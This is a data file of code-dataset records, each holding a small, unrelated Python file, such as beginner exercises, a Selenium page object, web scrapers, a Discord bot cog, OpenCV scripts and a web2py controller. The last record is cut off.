if i%3==0:\r\n print('Week {:d}:'.format((i//3)+1))\r\n ll.append(eval(input('Day {:d}:'.format((i%3)+1))))\r\n\r\nprint('Average: {:.2f}'.format(np.mean(ll)))\r\nprint('Highest:',max(ll))\r\nprint('Lowest:',min(ll))\r\n\r\n","sub_path":"pythonTQC+_ch6.py","file_name":"pythonTQC+_ch6.py","file_ext":"py","file_size_in_byte":8545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"5972110","text":"#!/usr/bin/env python3\n\nimport math\n\nx = int(input())\n\ncount = 0\nvalue = 100\nwhile(1):\n # for i in range(100):\n count += 1\n value = math.floor(value*1.01)\n # print(value)\n if value >= x:\n break\nprint(count)\n","sub_path":"abc165/b/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"344108448","text":"from selenium.webdriver.common.by import By\nfrom test_selenium.test_project.pages.basepage import BasePage\nfrom test_selenium.test_project.pages.contact_page import ContactPage\n\n\nclass AddMemberPage(BasePage):\n _username = (By.ID, \"username\")\n _cancel = (By.CSS_SELECTOR, \"[node-type='cancel']\")\n def add_member(self, name, acctid, memberAdd_phone):\n # find_element(By.ID, \"username\")\n self.find(*self._username).send_keys(name)\n self.find(By.ID, \"memberAdd_acctid\").send_keys(acctid)\n self.find(By.ID, \"memberAdd_phone\").send_keys(memberAdd_phone)\n # return self 是为了实现返回当前页面时依然可以实现链式调用\n # 相当于 别人调用是, add_member().save_member() 就等同于 self.save_member(self)\n return self\n\n def save_member(self):\n self.find(By.CSS_SELECTOR, \".js_btn_save\").click()\n return ContactPage(self.driver)\n\n def cancel_member(self):\n self.find(By.CSS_SELECTOR, \".js_btn_cancel\").click()\n self.wait_for_clickable(self._cancel)\n self.find(*self._cancel).click()\n return ContactPage(self.driver)\n\n\n\n","sub_path":"test_selenium/test_project/pages/add_member_page.py","file_name":"add_member_page.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"189473750","text":"h = []\ne = []\nl = []\no = []\ncount = 1\nmax = 10000\n\nmsg = list(input())\nlgth = len(msg)\n\nfor i in range(lgth):\n\ta = msg[i]\n\tif a == \"h\":\n\t\th.append(i)\n\tif a == \"e\":\n\t\te.append(i)\n\tif a == \"l\":\n\t\tl.append(i)\n\tif a == \"o\":\n\t\to.append(i)\n\nif len(h) > 0:\n\thmin = min(h)\n\tmax = hmin\n\n\tfor i in e:\n\t\tif i > max:\n\t\t\tmax = i\n\t\t\tcount = count + 1\n\t\t\tbreak\n\n\tfor i in l:\n\t\tif i > max:\n\t\t\tmax = i\n\t\t\tcount = count + 1\n\t\t\ti = l.index(i)\n\t\t\tdel l[i]\n\t\t\tbreak\n\n\tfor i in l:\n\t\tif i > max:\n\t\t\tmax = i\n\t\t\tcount = count + 1\n\t\t\tbreak\n\n\tfor i in o:\n\t\tif i > max:\n\t\t\tcount = count + 1\n\t\t\tbreak\n\nif count == 5:\n\tprint(\"YES\")\nelse:\n\tprint(\"NO\")\n","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"295429300","text":"import random, time\nimport sys, os\n\nfrom CronosCoinecy import Database\nfrom CronosCoinecy import Request\n\nD = Database()\nR = Request()\n\n# 1 request per second maximum to the API\ndef getRedditInfo():\n cursor = D.find('coins', { 'status': 'validated' })\n infosThread = {}\n \n for coin in cursor:\n if ('reddit' in coin):\n payload = getInfoCoins(coin)\n payload['coin_id'] = coin['_id']\n D.insert_one('reddit_channels', payload)\n\n print(\"{}: reddit infos have been updated\".format(coin['_id']))\n\n\ndef getInfoCoins(coin):\n redditUrl = coin['reddit']\n info = {}\n\n votes, comments, topics = getTopics(redditUrl)\n\n info = {\n \"votes\": votes,\n \"comments\": comments,\n \"redditUrl\": redditUrl,\n \"topics\": topics\n }\n\n return info\n\ndef getTopics(url, sumVotes = 0, sumComments = 0, sumTopics = 0):\n print(\"- [{}] - {} votes, {} comments, {} topics\".format(url, sumVotes, sumComments, sumTopics))\n time.sleep(random.random() * 2 + 4)\n soup = R.web(url)\n\n for link in soup.find_all(\"div\", {\"class\": \"link\"}):\n votes = link.find(\"div\", {\"class\": \"midcol unvoted\"}).find(\"div\", {\"class\": \"score unvoted\"}).text\n votes = votes.replace(\"•\", \"0\")\n\n if 'k' in votes:\n votes = float(votes.replace('k', '')) * 1000\n elif 'm' in votes:\n votes = float(votes.replace('m', '')) * 1000000\n\n sumVotes += int(votes)\n\n comments = link.find(\"ul\", {\"class\": \"buttons\"}).find(\"li\", {\"class\": \"first\"}).find(\"a\").text\n comments = comments.replace(\" comments\", \"\").replace(\"comment\", \"\")\n sumComments += int(comments) if (len(comments)) else 0\n\n sumTopics += 1\n\n nextButton = soup.find(\"span\", {\"class\": \"next-button\"})\n if (nextButton):\n nextButton = nextButton.find(\"a\")[\"href\"]\n topics = getTopics(nextButton, sumVotes, sumComments, sumTopics)\n\n return sumVotes, sumComments, sumTopics\n\n\ntry:\n getRedditInfo()\nexcept KeyboardInterrupt:\n print(\"Keyboard interrupt, stopping...\")\n\n\n","sub_path":"reddit/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"280221978","text":"import cv2\r\nimport numpy as np\r\nimport os\r\nimport matplotlib.pyplot as plt\r\n\r\ndef cropIM(imagepath, saveimagepath):\r\n\r\n img = cv2.imread(imagepath)\r\n img=cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\r\n img_copy=img.copy()\r\n drawing = False # True if mouse is pressed\r\n ix, iy = -1, -1\r\n outdir=saveimagepath\r\n # mouse callback function\r\n def draw_rectangle(event, x, y, flags, param):\r\n global ix, iy, drawing, mode\r\n if event == cv2.EVENT_LBUTTONDOWN:\r\n # When you click DOWN with left mouse button drawing is set to True\r\n drawing = True\r\n # Then we take note of where that mouse was located\r\n ix, iy = x, y\r\n\r\n elif event == cv2.EVENT_MOUSEMOVE:\r\n # Now the mouse is moving\r\n if drawing == True:\r\n\r\n # If drawing is True, it means you've already clicked on the left mouse button\r\n # We draw a rectangle from the previous position to the x,y where the mouse is\r\n img_copy1 = img_copy.copy()\r\n\r\n cv2.rectangle(img_copy1, (ix, iy), (x, y), (0, 255, 0), 3)\r\n\r\n\r\n elif event == cv2.EVENT_LBUTTONUP:\r\n # Once you lift the mouse button, drawing is False\r\n drawing = False\r\n # we complete the rectangle.\r\n cv2.rectangle(img_copy, (ix, iy), (x, y), (0, 255, 0), 3)\r\n # print(x,y)\r\n cv2.namedWindow(winname=\"Result\")\r\n roi = img[iy:y, ix:x]\r\n # blur = cv2.medianBlur(roi, n)\r\n # img[iy:y, ix:x, :] = blur\r\n cv2.imshow('Result', roi)\r\n\r\n elif event == cv2.EVENT_RBUTTONDOWN:\r\n if outdir is not None:\r\n roi = img[iy:y, ix:x]\r\n cv2.imwrite(outdir, roi)\r\n print(\"Successfully saved the result\")\r\n else:\r\n print(\"please provide the full path for saving the result\")\r\n\r\n # Create a black image\r\n # img = np.zeros((512, 512, 3), np.uint8)\r\n # This names the window so we can reference it\r\n cv2.namedWindow(winname='my_drawing')\r\n # cv2.namedWindow(winname='Result')\r\n # Connects the mouse button to our callback function\r\n cv2.setMouseCallback('my_drawing', draw_rectangle)\r\n cv2.setMouseCallback('Result', draw_rectangle)\r\n\r\n\r\n while True: # Runs forever until we break with Esc key on keyboard\r\n # Shows the image window\r\n cv2.imshow('my_drawing', img_copy)\r\n\r\n # CHECK TO SEE IF ESC WAS PRESSED ON KEYBOARD\r\n if cv2.waitKey(1) & 0xFF == 27:\r\n break\r\n cv2.destroyAllWindows()\r\n\r\n","sub_path":"imagefunctions/crop.py","file_name":"crop.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"522607907","text":"import os.path\r\nimport sys\r\n\r\ndef main():\r\n\r\n keywords = {\"and\": 0, \"as\": 0, \"assert\": 0, \"break\": 0, \"class\": 0,\r\n \"continue\": 0, \"def\": 0, \"del\": 0, \"elif\": 0, \"else\": 0,\r\n \"except\": 0, \"False\": 0, \"finally\": 0, \"for\": 0, \"from\": 0,\r\n \"global\": 0, \"if\": 0, \"import\": 0, \"in\": 0, \"is\": 0, \"lambda\": 0,\r\n \"None\": 0, \"nonlocal\": 0, \"not\": 0, \"or\": 0, \"pass\": 0, \"raise\": 0,\r\n \"return\": 0, \"True\": 0, \"try\": 0, \"while\": 0, \"with\": 0, \"yield\": 0}\r\n\r\n filename = input(\"Enter the filename: \").strip()\r\n\r\n if not os.path.isfile(filename):\r\n print(\"File\", filename, \"does not exist\")\r\n sys.exit()\r\n\r\n readfile = open(filename, \"r\")\r\n\r\n text = readfile.readlines()\r\n\r\n # for i in range(len(text)):\r\n\r\n for line in text:\r\n for word in line.split():\r\n if word in keywords:\r\n keywords[word] += 1\r\n\r\n for itm in keywords:\r\n print(itm, \":\", keywords[itm])\r\n\r\n\r\nmain()\r\n\r\n\r\n\r\n","sub_path":"14.3.py","file_name":"14.3.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"137381142","text":"# -*- coding: utf-8 -*-\n# from __future__ import division, absolute_import\n\n# Thanks to Neal Becker\n\nimport numpy as np\nfrom numba import *\nfrom numba.vectorize import vectorize\nfrom math import exp, log1p\n\n\n@vectorize([f8(f8,f8)])\ndef log_exp_sum2 (a, b):\n if a >= b:\n return a + (exp (-(a-b)))\n else:\n return b + (exp (-(b-a)))\n ## return max (a, b) + log1p (exp (-abs (a - b)))\n\n\n#@autojit\n@jit(f8[:,:] (f8[:,:]))\ndef log_exp_sum (u):\n s = u.shape[1] # Test wraparound when implemented!\n if s == 1:\n return u[...,0]\n elif s == 2:\n return log_exp_sum2 (u[...,0], u[...,1])\n else:\n return log_exp_sum2 (\n log_exp_sum (u[...,:s/2]),\n log_exp_sum (u[...,s/2:]))\n\n\nfrom timeit import timeit\nL = 1000\nN = 100\nu = np.tile (np.log (np.ones (L)/L), (N, 1))\n#v = log_exp_sum (u)\nfrom timeit import timeit\nprint(timeit(\n 'log_exp_sum(u)', 'from __main__ import u, log_exp_sum', number=50))\n","sub_path":"oldnumba/tests/issues/test_issue_185.py","file_name":"test_issue_185.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"255251296","text":"from pflacs import Premise\nbase = Premise(\"Base case\",\n parameters={\"a\":10,\"b\":5})\n#print(f\"base.a={base.a} base.b={base.b}\")\n\n\ndef adda(a, b, c=0):\n \"\"\"Add number b to number a. Optionally also add c.\n \"\"\"\n print(f\"«adda» w/args a={a} b={b}\", end=\"\")\n print(f\" c={c}\") if c else print()\n return a + b + c\n\nbase.plugin_func(adda) \n\n# result = base.adda()\n# print(f\"base.adda() result={result}\")\n\n# result = base.adda(b=-3)\n# print(f\"base.adda(b=-3) result={result}\")\n# result = base.adda(5, 4.2, -3)\n# print(f\"base.adda(5,4.2,-3) res={result}\")\n\n\ndef subx(x, y, z=0):\n \"\"\"Subtract number y from number x. Optionally also subract z.\n \"\"\"\n print(f\"«subx» w/args x={x} y={y}\", end=\"\")\n print(f\" z={z}\") if z else print()\n return x - y - z\n\nbase.plugin_func(subx, argmap={\"x\":\"a\",\n \"y\":\"b\", \"z\":\"c\"} )\nbase.add_param(\"c\", 6.5)\n# print(\"base.subx() =\", base.subx() )\n# print(\"base.subx(b=99) =\", base.subx(b=99) )\n\nlc1 = Premise(\"Load case 1\", parent=base,\n parameters={\"a\":100})\n# result = lc1.adda()\n# print(f\"lc1.adda() result={result}\")\n\nfrom pflacs import Calc\nlc1_sub = Calc(\"LC1 «subx()»\", lc1, funcname=\"subx\")\nlc1_sub(); print(lc1_sub._subx)\n#print(f\"lc1_sub() result={lc1_sub._subx}\")\n\nlc1_add = Calc(\"LC1 «adda()»\", lc1, funcname=\"adda\", \n argmap={\"return\":\"adda_res\"})\nlc1_add(); print(lc1_add.adda_res)\ndf = lc1_add.to_dataframe(); print(df)\n\nlc2 = base.add_child( lc1.copy() )\nlc2.name = \"Load case 2\"\nlc2.a = 200\nlc2_sub = lc2.get_child_by_name(\"LC1 «subx()»\")\nlc2_sub.name = \"LC2 «subx()»\"\nlc2_add = lc2.get_child_by_name(\"LC1 «adda()»\")\nlc2_add.name = \"LC2 «adda()»\"\n\n\ndef multk(k:\"a\", l:\"b\", m:\"c\" = 1) -> \"mult_res\":\n return k * l * m\nbase.plugin_func(multk)\nresult = base.multk()\nprint(f\"{base.a} * {base.b} * {base.c} = {result}\")\n\nlc3_mul = Calc(\"LC3 «multk()»\", base, funcname=\"multk\")\nimport numpy as np\nlc3_mul.b = np.linspace(0,10,3)\nlc3_mul()\nlc3_mul.to_dataframe()\n# print(f\"{lc3_mul.a}*{lc3_mul.b}*{lc3_mul.c}={lc3_mul.mult_res}\")\n\nfor _n in base:\n if type(_n) == Calc:\n _n()\n\nbase.savefile(\"simple_study.pflacs\")\n\nfor node in base:\n if type(node) == Calc:\n node.to_hdf5()\n\n","sub_path":"drafts/simple_pflacs.py","file_name":"simple_pflacs.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"563642899","text":"#same class as Number_Advanced4.py, except using the error check function clled 'confirmInt' which has now been added to NumberCruncher.py\r\nimport NumberCruncher #using the class \"NumberCruncher\"\r\n\r\nvalidInput1 = int #THERE IS DEFINATELY A BETTER WAY TO DO THIS, SOME SORT OF \".CHECK()\" TOOLS IS MOST LIKELY AVAILABLE\r\nvalidInput2 = int #BUT FOR RIGHT NOW, COMPARE THIS TO \"Number_Advanced4.py\" TO WORK OUT WHY I HAD TO USE IT\r\n #I DON'T EVEN NEED TO DECLARE THEM HERE! I CAN JUST DECLARE LAETER BUT FOR THIS EXAMPLE,\r\n #GOOD TO HAVE THEM HERE SO WE CAN SEE WHAT THEY DO\r\n\r\nuserInput1 = (input(\"Enter your first number: \"))\r\nvalidAnswer = NumberCruncher.confirmInt(userInput1) #use my function 'NumberCruncher.checkInt' above to make sure it's a number\r\nwhile validAnswer == False: #Creates a while loop that follows the indented instruction below\r\n print(\"No.. that is not avalid entry\")\r\n userInput1 = (input(\"Enter your first number again: \"))\r\n validAnswer = NumberCruncher.confirmInt(userInput1) #this updates the validAnswer variable, eventually allowing us to break this loop\r\n # when the user enter an actual integer\r\nvalidInput1 = int(userInput1)\r\n\r\n\r\n\r\nuserInput2 = (input(\"Enter your second number: \"))\r\nvalidAnswer = NumberCruncher.confirmInt(userInput2) #use my function 'NumberCruncher.confirmInt' above to make sure it's a number\r\nwhile validAnswer == False: #Creates a while loop that follows the indented instruction below\r\n print(\"No.. that is not avalid entry\")\r\n userInput2 = (input(\"Enter your second number again: \"))\r\n validAnswer = NumberCruncher.confirmInt(userInput2) #this updates the validAnswer variable, eventually allowing us to break this loop\r\n # when the user enter an actual integer\r\nvalidInput2 = int(userInput2)\r\n\r\nprint(\"Your entries added together = \",(NumberCruncher.addition(validInput1,validInput2)))\r\n#The above print line gives the user entries to the function 'addition' inside 'NumberCruncher'\r\n#The below print lines to the same with their respected functions\r\n\r\nprint(\"Your entries subtracted from one another = \",(NumberCruncher.subtraction(validInput1,validInput2)))\r\nprint(\"Your entries divided by each other = \",(NumberCruncher.divide(validInput1,validInput2)))\r\nprint(\"Your entries multiplied together = \",(NumberCruncher.multiply(validInput1,validInput2)))\r\n\r\n#Below displays same answers but in sum form\r\nprint(validInput1,\" + \", validInput2, \" = \",(NumberCruncher.addition(validInput1,validInput2)))\r\nprint(validInput1,\" - \", validInput2, \" = \",(NumberCruncher.subtraction(validInput1,validInput2)))\r\nprint(validInput1,\" / \", validInput2, \" = \",(NumberCruncher.divide(validInput1,validInput2)))\r\nprint(validInput1,\" * \", validInput2, \" = \",(NumberCruncher.multiply(validInput1,validInput2)))\r\n\r\n\r\n#NOW TO USE THE DATA IN A DIFFERENT WAY\r\n\r\n\r\naddtionAnswer = (NumberCruncher.addition(validInput1,validInput2)) #loads answer from addition function and so on for the 3 lines\r\nsubAnswer = (NumberCruncher.subtraction(validInput1,validInput2))\r\ndivAnswer = (NumberCruncher.divide(validInput1,validInput2))\r\ntimesAnswer =(NumberCruncher.multiply(validInput1,validInput2))\r\n\r\n#Loads new variables with data to pass test for zero function\r\nsubZeroCheck =(NumberCruncher.notZero(subAnswer)) #passes subAnswer to zeroCheck function in NumberCruncher class\r\naddZeroCheck =(NumberCruncher.notZero(addtionAnswer)) #passes addAnswer to zeroCheck function in NumberCruncher class\r\ndivZeroCheck =(NumberCruncher.notZero(divAnswer)) #passes divAnswer to zeroCheck function in NumberCruncher class\r\ntimesZeroCheck =(NumberCruncher.notZero(timesAnswer)) #passes timesAnswer to zeroCheck function in NumberCruncher class\r\n\r\n#prints zero check results\r\nprint(\"Did adding give zero as an answer? :\",addZeroCheck) #these lines should explain themselves\r\nprint(\"Did subtracting give zero as an answer? :\",subZeroCheck)\r\nprint(\"Did dividing give zero as an answer? :\",divZeroCheck)\r\nprint(\"Did multiplyinh give zero as an answer? :\",timesZeroCheck)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Number_Advanced4-3.py","file_name":"Number_Advanced4-3.py","file_ext":"py","file_size_in_byte":4172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"472175798","text":"import requests\nfrom bs4 import BeautifulSoup\nimport urllib\nimport datetime\nimport time\n\nimport pymysql as pysql\n\ndef insertStock(arr):\n conn = pysql.connect(host='localhost', port=3307, user='root', password='python', db='pydb', charset='utf8')\n cur = conn.cursor()\n \n sql = \"\"\"INSERT INTO stock (s_name, s_code, price, crw_date)\n VALUES(%s, %s, %s, %s)\"\"\"\n \n cnt = cur.executemany(sql, arr) \n print(cnt)\n \n conn.commit()\n cur.close()\n conn.close()\ncount = 0\nfor i in range(10):\n response = requests.get(\"http://stock.hankyung.com/apps/rank.panel_sub?market=1\")\n response.encoding = \"euc-kr\"\n soup = BeautifulSoup(response.text, \"html.parser\")\n sbjs = soup.select(\".sbj\")\n \n crw_date = datetime.datetime.now().strftime(\"%Y%m%d,%H%M\")\n \n arr = []\n count += 1\n for sbj in sbjs:\n s_name = sbj.text\n s_code = sbj.a[\"href\"].split(\"=\")[1]\n price = sbj.parent.select(\"td\")[1].text.replace(\",\", \"\")\n arr.append((s_name,s_code,price,crw_date))\n \n insertStock(arr)\n print(count,\"번째 인서트중\")\n time.sleep(60)\n\n\n \n \n\n\n","sub_path":"HelloPython/day08/mycrawl06stock.py","file_name":"mycrawl06stock.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"382761517","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass Robot(object):\n def __init__(self,x,y,vx,vy,taille,collision_avoidance_coefficient,aggressive_flocking_coefficient,collision_sensibility_radius):\n self.x = x\n self.y = y\n self.vx = vx\n self.vy = vy\n self.taille = taille\n self.collision_avoidance_coefficient = collision_avoidance_coefficient\n self.aggressive_flocking_coefficient = aggressive_flocking_coefficient\n self.collision_sensibility_radius = collision_sensibility_radius\n\n def position(self):\n return(np.array([self.x,self.y]))\n\n def imprime_robot(self,ax):\n size = self.taille\n x_1 = self.x\n y_1 = self.y\n color = np.array([\"green\"])\n ax.scatter(x_1,y_1,s=size,c=color)\n","sub_path":"projet robots/robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"297263178","text":"# coding: utf8\n# intente algo como\ndef asignarPermiso():\n listado = db(db.auth_user.registration_key == 'pending').select(db.auth_user.id,db.auth_user.dni, db.auth_user.first_name, db.auth_user.last_name, db.auth_user.email,db.auth_user.registration_key)\n\n tabla = SQLTABLE((listado),\n headers={'auth_user.id':'ID', \n 'auth_user.dni':'DNI', \n 'auth_user.first_name':'Nombre',\n 'auth_user.last_name':'Apellido',\n 'auth_user.email':'E-mail',\n 'auth_user.registration_key':'Estado'},\n linkto ='editar')\n form=SQLFORM(db.auth_membership)\n if form.accepts(request.vars,session):\n response.flash='Se asigno membresia'\n return dict (form = form, tabla = tabla)\n\ndef editar():\n id = request.args[1]\n query = db(db.auth_user.id == id).select(db.auth_user.last_name,db.auth_user.first_name,db.auth_user.registration_key)\n form = SQLFORM(db.auth_user, id, fields = ['last_name','first_name','registration_key'] )\n if form.accepts(request.vars,session):\n response.flash = 'Listo!'\n redirect(URL(r=request, f='asignarPermiso'))\n elif form.errors:\n response.flash = 'Hay uno o mas errores'\n return dict(form = form)\n","sub_path":"controllers/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"281441332","text":"import discord\nfrom redbot.core import commands\nimport asyncio\n\nclass PressF(commands.Cog):\n \"\"\"You can now pay repect to a person\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n self.messager = {}\n self.messagem = {}\n\n @commands.command(pass_context=True, no_pm=True)\n async def pressf(self, ctx, user: discord.User=None):\n \"\"\"Pay Respects by pressing f\"\"\"\n\n author = ctx.author\n channel = ctx.channel\n\n if channel.id in self.messager or channel.id in self.messagem:\n return await ctx.send(\"Oops! I'm still paying respects in this channel, you'll have to wait until I'm done.\")\n \n def check_message(m):\n return (m.author == author and m.channel == channel)\n\n if user:\n answer = user.display_name\n else:\n await ctx.send(\"What do you want to pay respects to?\")\n message = await self.bot.wait_for(\"message\", check=check_message, timeout=120.0)\n\n if message is None:\n return await ctx.send(\"You took too long to reply.\")\n \n answer = message.content\n \n msg = f\"Everyone, let's pay respects to **{answer}**! Press the F reaction on this message to pay respects.\"\n\n message = await ctx.send(msg)\n\n try:\n await message.add_reaction(\"\\U0001f1eb\")\n self.messager[channel.id] = []\n react = True\n except:\n self.messagem[channel.id] = []\n react = False\n await message.edit(content=f\"Everyone, let's pay respects to **{answer}**! Press the F reaction on the this message to pay respects.\")\n\n def check(m):\n return m.channel == ctx.channel\n\n await self.bot.wait_for(\"message\", check=check)\n\n await asyncio.sleep(120)\n await message.delete()\n\n if react:\n amount = len(self.messager[channel.id])\n else:\n amount = len(self.messagem[channel.id])\n\n amount_of_people = \"person has\" if str(amount) == \"1\" else \"people have\"\n await channel.send(f\"**{amount}** {amount_of_people} paid respects to **{answer}**.\")\n \n if react:\n del self.messager[channel.id]\n else:\n del self.messagem[channel.id]\n \n async def on_reaction_add(self, reaction, user):\n message = reaction.message\n channel = message.channel\n\n if user.id == self.bot.user.id:\n return\n if channel.id not in self.messager:\n return \n if user.id not in self.messager[channel.id]:\n if str(reaction.emoji) == \"\\U0001f1eb\": \n await channel.send(f\"**{user.mention}** has paid respects.\")\n self.messager[channel.id].append(user.id)\n\n async def on_message(self, message):\n channel = message.channel\n user = message.author\n\n if channel.id not in self.messagem:\n return \n if user.id not in self.messagem[channel.id]:\n if message.content.lower() == \"f\":\n await ctx.send(\"**{user.mention}** has paid respects.\")\n self.messagem[channel.id].append(user.id)\n","sub_path":"cherubim/pressf.py","file_name":"pressf.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"350696901","text":"# -*- coding: utf-8 -*-\n__author__ = 'Sally Wang'\n\nfrom bs4 import BeautifulSoup\nimport re\nfrom decimal import Decimal as D\nfrom commons import common\nfrom commons.const import const\nfrom testCase.departments.testGetDepartment import GetDepartment\nfrom testCase.users import testGetUser as users\n\nclass GetLeads:\n def __init__(self, cookie, csrf):\n #'https://e.ikcrm.com/\n # self.base_url = base_url\n self.common = common.Common(cookie, csrf)\n self.base_url = const.BASE_URL\n self.base_url2 = const.SIGN_IN_BASE_URL\n self.testGetDepartment = GetDepartment(cookie, csrf)\n self.user = users.GetUser(cookie, csrf)\n self.csrf = csrf\n self.cookie = cookie\n pass\n\n #获得所有的我的线索,我下属的线索,我的线索来查询 获取线索tab\n def get_all_scope(self):\n url = self.base_url + 'leads/'\n params = {\n 'scope':'all_own',\n 'section_only':'true'\n }\n response = self.common.get_response_json(url, params, '获取线索页面的scope')\n soup = BeautifulSoup(response.content, 'html.parser')\n scopes = re.findall(r\"leads\\?scope=(.*?)\\\">\",str(soup))\n return scopes\n\n #线索查重\n def duplicate_leads(self):\n url = self.base_url + 'duplicate'\n params = {\n 'add': 'yes',\n 'key': 'lead'\n }\n self.common.get_response_json(url, params, '打开线索查重')\n url = self.base_url + 'duplicate/search'\n params = {\n 'key': 'lead',\n 'query': '1323234'\n }\n response = self.common.get_response_json(url, params, '线索查重')\n #To Be Done 查重没有数据之后新增线索\n if response:\n print (\"Lead's duplication is passed!\")\n else:\n print (\"Sorry, Lead's duplication is fialed!\")\n\n # 获取当前页的lead_id\n def lead_ids(self):\n url = self.base_url + 'leads'\n body = {\n 'order': 'asc',\n 'scope': 'all_own',\n 'sort': 'leads.updated_at desc',\n 'per_page': 10,\n 'type': 'advance',\n 'section_only': 'true'\n }\n response = self.common.get_response_json(url, body, '获取当前页的线索')\n if not response:\n return {}\n self.response = response\n S = self.response.content\n soup = BeautifulSoup(S, \"html.parser\")\n # print(soup)\n checked_lead = soup.find(attrs={'data-entity-table-name': 'lead'})\n if checked_lead:\n a = str(checked_lead)\n lead_id_list = re.findall(r\"data-id=\\\"(.*?)\\\">\", a)\n return lead_id_list\n\n # 导出所选线索\n def export_selected_leads(self, scope):\n lead_ids = self.lead_ids()\n url = self.base_url + 'leads?export_page=1&format_type=calculate_export_pages&order=asc&per_page=10&scope=' + scope + '&sort=leads.updated_at+desc&type=advance&selected_ids%5B%5D=' + \\\n lead_ids[0] + '&selected_ids%5B%5D=' + lead_ids[1] + '&format=js'\n self.common_get_resonse_json(url, 'export_selected_leads')\n url = self.base_url + 'leads.js?export_page=1&format_type=xlsx&order=asc&per_page=10&scope=' + scope + '&selected_ids%5B%5D=' + \\\n lead_ids[0] + '&selected_ids%5B%5D=' + lead_ids[\n 1] + '&sort=leads.updated_at+desc&type=advance'\n self.common_get_resonse_json(url, 'excute download export selected file')\n\n # 导出全部线索\n def export_all_leads(self, scope):\n url = self.base_url + 'leads?format_type=calculate_export_pages&order=asc&per_page=10&scope=' + scope + '&sort=leads.updated_at+desc&type=advance'\n self.common_get_resonse_json(url, 'export_all_leads')\n\n # 点击下载文档\n url = self.base_url + 'leads?export_page=1&format_type=xlsx&order=asc&per_page=10&scope=' + scope + '&sort=leads.updated_at+desc&type=advance'\n self.common_get_resonse_json(url, 'excute download export all lead file')\n\n # 获取单个线索详情\n def get_lead(self, lead_id):\n url = self.base_url + 'leads/' + str(lead_id)\n body = {}\n response = self.common.get_response_json(url, body, '获取当前线索详情')\n if response != False:\n soup = BeautifulSoup(response.content, 'html.parser')\n return soup\n\n\n\n #查看线索的任务\n def get_events(self, lead_id):\n url = self.base_url + 'events?entity_id='+str(lead_id)+'&entity_klass=Lead'\n params = {\n 'entity_id': lead_id,\n 'entity_klass': 'Lead'\n }\n self.common.get_response_json(url, params, '获取当前线索的任务')\n\n #查看线索下的附件\n def get_attachment(self, lead_id):\n url = self.base_url + 'api/attachments?page=&perPage=15&entity_id='+str(lead_id)+'&klass=Lead&sub_type=file'\n params = {\n 'page':'',\n 'perPage':15,\n 'entity_id':lead_id,\n 'klass':'Lead'\n }\n self.common.get_response_json(url, params, '获取当前线索的附件')\n\n #查看线索的操作日志\n def get_operation_logs(self, lead_id):\n url = self.base_url + 'api/operation_logs?page=&perPage=15&loggable_id='+str(lead_id)+'&loggable_type=Lead'\n params = {\n 'page':'',\n 'perPage':15,\n 'loggable_id':lead_id,\n 'loggable_type':'Lead'\n }\n self.common.get_response_json(url, params, '查看线索的操作日志')\n","sub_path":"testCase/leads/testGetLeads.py","file_name":"testGetLeads.py","file_ext":"py","file_size_in_byte":5580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"237615420","text":"import cv2\nimport numpy as np\nimport os\n\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n#CascadeClassifier object and file contains the face features\neye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')\n\ncap=cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT,700)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH,700)\npath='/home/pranjal/Desktop/RM/RM-Coding-kids/Pranjal/OpenCV/Haar_Cascade_Classifier'\ni,j=0,0\nwhile True:\n ret,img=cap.read()\n gray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n faces=face_cascade.detectMultiScale(gray,1.5,5) #Helps to find the face co-ordinates\n #1.3 is scale factor . Decrease the shape value until the\n #face is found . Smaller the value , greater the accuracy\n for (x,y,w,h) in faces:\n cv2.rectangle(img,(x,y),(x+w,y+h),(0,255,0),2) # Getting the coordinates for the face rectangle\n #Remove comments to use eye detection\n \"\"\"\n roi_gray=gray[y:y+h,x:x+h]\n roi_color=img[y:y+h,x:x+h]\n eyes=eye_cascade.detectMultiScale(roi_gray,1.3,5)\n for 